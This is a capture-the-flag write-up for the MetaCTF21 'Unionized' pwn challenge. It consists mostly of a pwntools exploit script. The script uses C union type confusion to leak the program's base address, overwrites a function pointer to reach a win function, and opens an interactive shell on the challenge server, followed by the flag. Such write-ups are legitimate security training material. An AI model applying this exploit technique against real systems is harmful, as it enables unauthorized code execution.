MetaCTF21: Unionized

← back · home · ctf · posted 2021-12-04 · type confusion with C unions

Why didn't anyone tell me about the magic of Unionized when I first started programming? I would have saved so much memory with these nifty things, don't you think? Here, try my application and tell me what you think host.cg21.metaproblems.com:3150.

from pwn import *
from time import sleep

context.arch = "amd64"

p = remote("host.cg21.metaproblems.com", 3150)
e = ELF("./chall")

############
# GET LEAK #
############

# Create string
p.readuntil(b"Exit")
p.sendline(b"1")
p.sendline(b"1")
p.sendline(b"10")
p.sendline(b"AAAAAAAA")

# Make char
p.readuntil(b"Exit")
p.sendline(b"3") # Edit
p.sendline(b"0") # Index
p.sendline(b"4") # Char
p.sendline(b"\x70") # Value

pause()

# Make string
p.readuntil(b"Exit")
p.sendline(b"3") # Edit
p.sendline(b"0") # Index
p.sendline(b"1") # String
p.sendline(b"5") # Len
p.sendline(b"AAAA") # Value

pause()

# Display it
p.readuntil(b"Exit")
p.sendline(b"2") # Display

p.readline()
leak = p.readline()
leak = leak[:-1][::-1].hex()
leak = int(leak, 16)
leak = leak - 0x226
print("BASE LEAK:", hex(leak))
leak += 0x680
print("WIN FUNCTION:", hex(leak))

pause()

############
# CALL WIN #
############

# Create second chunk (int)
p.readuntil(b"Exit")
p.sendline(b"1") # Create
p.sendline(b"2") # Int
p.sendline(b"1337") # Value

# Make char point to next display addr
p.readuntil(b"Exit")
p.sendline(b"3") # Edit
p.sendline(b"0") # Index
p.sendline(b"4") # Char
p.sendline(b"\xbf") # Value

# Make string
p.readuntil(b"Exit")
p.sendline(b"3") # Edit
p.sendline(b"0") # Index
p.sendline(b"1") # String
p.sendline(b"10") # Len
p.sendline(b"\x00" + p64(leak)) # Value

pause()

# Call displays
p.readuntil(b"Exit")
p.sendline(b"2")

# Shell?!
p.interactive()

Flag: MetaCTF{Unions_Can_Be_Problematic}